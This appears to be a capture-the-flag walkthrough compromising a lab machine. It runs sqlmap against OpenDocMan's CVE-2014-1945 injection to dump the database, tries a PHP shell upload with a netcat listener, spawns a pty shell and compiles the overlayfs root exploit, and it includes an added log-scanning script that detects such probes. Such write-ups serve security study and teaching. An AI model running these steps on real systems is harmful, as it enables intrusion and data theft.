Let’s start with nmap to determine what services are running.
nmap -p- -sV 192.168.2.14
So there is a web server, SSH and IRC running.
Let’s start off with the web server.
There are a lot of directories but none really stick out. Time to look at all the pages.
On 192.168.2.14/jabc/?=node/7 there is an empty page.
But looking at the page source (or pressing CTRL+A to reveal hidden text) shows a hidden message that refers to another site with login possibilities (guest:guest).
At first glance there is a notice of what the site is running on:
OpenDocMan v1.2.7 → document management software.
Let’s see what there is to find about this piece of software on exploit-db.
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.
SQL Injection in OpenDocMan: CVE-2014-1945
The vulnerability exists due to insufficient validation of the “add_value” HTTP GET parameter in the “/ajax_udf.php” script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application’s database.
So a SQL injection is possible via the add_value parameter. Let’s start up sqlmap.
sqlmap -u 'http://192.168.2.14/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -p add_value --current-db
sqlmap -u 'http://192.168.2.14/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -p add_value -D jabcd0cs --dump
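From the defender’s side, the injection point above is easy to spot in web server logs: add_value only ever carries a bare table or column name (odm_user in the command above), so any request where it contains anything beyond identifier characters is a probe. The script below is an added example, not part of the original walkthrough or of OpenDocMan; the Apache combined-format log lines, IPs and user-agent strings in it are constructed for illustration.

```python
# Added example: flag access-log entries that probe /ajax_udf.php?add_value=...
# (the CVE-2014-1945 injection point). Not code from the walkthrough or OpenDocMan.
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (Apache combined format); nothing here is real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 811 "-" "sqlmap/1.7"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /jabcd0cs/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user'%20AND%20SLEEP(5)-- HTTP/1.1" 200 811 "-" "sqlmap/1.7"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# add_value is a SQL identifier (table/column name): letters, digits, underscore only.
IDENT_RE = re.compile(r'^[A-Za-z0-9_]+$')


def check_line(line):
    """Return a finding dict for a suspicious ajax_udf.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not parts.path.endswith('/ajax_udf.php'):
        return None
    # parse_qs percent-decodes, so encoded spaces/quotes are checked in decoded form.
    qs = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for value in qs.get('add_value', []):
        if not IDENT_RE.match(value):
            reasons.append(f'add_value is not a bare identifier: {value!r}')
    if 'sqlmap' in m.group('ua').lower():
        reasons.append('sqlmap user-agent')
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'ts': m.group('ts'), 'reasons': reasons}


def scan_log(text):
    """Run check_line over every line of a log and return the findings in order."""
    return [hit for hit in (check_line(l) for l in text.splitlines()) if hit]


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['ts'], hit['ip'], '; '.join(hit['reasons']))
```

The identifier allowlist is the signal to rely on; the user-agent check only catches scanners left at their default settings. The same allowlist is also the fix on the application side: reject any add_value that is not a plain identifier before it reaches a query.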
A quick look on md5decrypt.org shows that the hash cracks to:
Let’s upload a shell file.
Hmmmm…..restricted. Oh well.
Let’s adjust the filter types.
Add document: text/x-php
Let’s try again.
Now let’s start listening.
nc -lvnp 31337
And let’s view the document.
Crap… the only option is downloading it, not running it.
That’s no good.
So let’s try this angle.
ssh 192.168.2.14 -p 22 -l webmin
Let’s get a proper shell.
python -c 'import pty;pty.spawn("/bin/bash")'
Let’s look around. Some interesting directories.
and of course /root.
Both restricted. Let’s get root.
We know the server runs on Ubuntu 14.04.
So let’s try the overlayfs exploit (https://www.exploit-db.com/exploits/37292/).
gcc overlayfs.c -o overlayfs
chmod 755 overlayfs
Now let’s check those dirs again.
The dir vulnosadmin has a strange file in it: r00t.blend
r00t.blend: Blender3D, saved as 32-bits little endian with version 2.77
The root dir has the flag: